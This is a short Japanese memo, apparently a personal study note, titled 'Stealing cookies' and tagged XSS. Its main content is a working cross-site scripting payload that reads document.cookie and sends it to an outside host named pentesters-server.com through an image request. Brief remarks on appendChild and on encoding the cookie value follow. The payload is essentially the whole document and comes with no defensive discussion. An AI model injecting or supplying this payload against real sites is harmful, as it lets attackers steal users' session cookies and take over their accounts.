cookieを奪取する - kenjiked

cookieを奪取する

#XSS #cookie #JavaScript

code:JavaScript

<script>

var cookie = document.cookie;

var img = new Image(); //var img = document.createElement('img');でもOK

img.src = "http://pentesters-server.com/stealcookie.php?cookie="+cookie;

document.body.appendChild(img);

</script>

appendChildはメソッドじゃなくて関数

厳密にはcookieに特殊文字が入ると文字化けする可能性があるので、+はダメ．

documentはHTMLファイル全体を指す